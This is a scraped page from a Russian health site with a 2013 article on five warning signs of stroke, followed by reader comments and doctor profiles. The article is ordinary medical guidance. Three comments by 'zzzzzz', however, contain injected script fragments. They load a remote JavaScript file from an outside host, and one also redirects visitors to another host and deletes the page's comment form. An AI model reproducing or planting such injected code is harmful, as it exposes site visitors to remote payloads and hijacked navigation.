Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  У вашего близкого инсульт...  >>  У вашего близкого инсульт! 5 признаков
 
Обратная связь
 

У вашего близкого инсульт! 5 признаков

Размер шрифта
23 мая 2013 00:00
  • google_analytics: false
  • Нравится

Согласно данным Американской Ассоциации Сердца, каждые 45 секунд в мире случается инсульт. Чтобы помочь близкому, вы должны уметь распознать пять признаков инсульта и обратиться за помощью, ведь чем раньше начать лечение, тем лучше результат.

Немедленное лечение таких пациентов резко снижает возможные риски. Особенно важное значение имеет тромболитическая терапия (восстановление кровотока в сосуде за счет разрушения тромба). Загвоздка в том, что использовать такие лекарства нужно в течение первых часов после начала болезни.

Помните, что не все приступы одинаковы. Даже если человек уже перенес однажды что-то подобное, следующий инсульт может иметь совершенно другие симптомы.

Что делать при признаках инсульта

Часто больной с инсультом недооценивает и преуменьшает тяжесть своего состояния, потому что не хочет волновать близких из-за «пустяков». Возьмите ситуацию под контроль и обратитесь за помощью, даже если человек убеждает, что с ним все в порядке. Обратитесь к врачу, даже если симптомы перестали беспокоить. Это может быть транзиторной ишемической атакой (микроинсульт), которая предшествует полноценному инсульту.

Если вы заметили один из перечисленных ниже признаков, немедленно позвоните в «скорую». Отметьте время появления симптомов, это может быть крайне важно для врачей скорой помощи.

Признак №1

Внезапный паралич лица, рук или ног, особенно с одной стороны тела.

Вы можете заметить, что угол рта у человека опущен. Попросите его улыбнуться, чтобы удостовериться. Также могут возникнуть трудности в управлении конечностями. Если попросить больного поднять руки, закрыв глаза, одна из рук может уходить в сторону или опускаться.

Признак №2

Внезапное помутнение сознания, проблемы с речью.

Затруднение речи – один из самых частых признаков инсульта. Человек неожиданно начинает проглатывать слова. Скорее всего, ему также будет сложно понять чужую речь. Попросите его повторить простую фразу, например: «Сегодня я ходил в магазин». Если у него возникнут трудности, скорее всего, это вызвано инсультом.

Признак №3

Внезапное нарушение зрения в одном или обоих глазах.

Проблемы со зрением – другой частый признак инсульта. Человек может перестать видеть одним или двумя глазами. Возможны затруднения во взгляде вправо или влево. Также он может жаловаться на расплывчатость предметов и двоение в глазах.

Признак №4

Внезапное изменение походки, нарушение равновесия и координации, головокружение.

«Пьяная» походка, спотыкания или даже падения могут быть симптомами инсульта. Также иногда наблюдаются походка с расставленными ногами или такие моторные нарушения, как затруднения письма.

Признак №5

Внезапная сильная головная боль, возникшая без видимых причин.

Конечно, головная боль далеко не всегда обусловлена инсультом. Но если она возникла внезапно и протекает очень интенсивно, то это повод насторожиться. Если головная боль сопровождается напряжением мышц шеи, болью в лице, тошнотой и рвотой, то следует заподозрить внутричерепное кровоизлияние, один из видов инсульта.

Разумеется, не всегда при инсульте присутствуют все перечисленные признаки. Не теряйте бдительность, если симптомы появлялись, а затем исчезли. И ни в коем случае не позволяйте больному отговорить вас вызвать помощь. Объясните ему, что вы понимаете, что он расстроен и смущен, но помощь все равно необходима. Лучшее, что вы можете сделать для больного с инсультом – обеспечить ему незамедлительное лечение.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

11 января 2015 в 12:33

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 19:18

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 19:33

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 23:16

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Простая стелька учит людей заново ходить   Болезни-близнецы. Мигрень и инсульт   Поделись улыбкою своей   Сколько спать, чтобы не было инсульта? Вы удивитесь!  
28 января 2013Надежда для пациентов с тяжелыми последствиями инсульта 02 апреля 2013Революция в лечении головной боли
 
26 февраля 2013Ученые создают мозговые клетки из мочи 16 января 2013То, что мы слышим, зависит от того, что мы делаем
 

Слайдшоу

1
Руководство по предотвращению инсульта
Как спасти родителей от инсульта
Как не умереть от инсульта

Тесты

Знаете ли вы свой мозг?
Будет ли у вас инфаркт?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.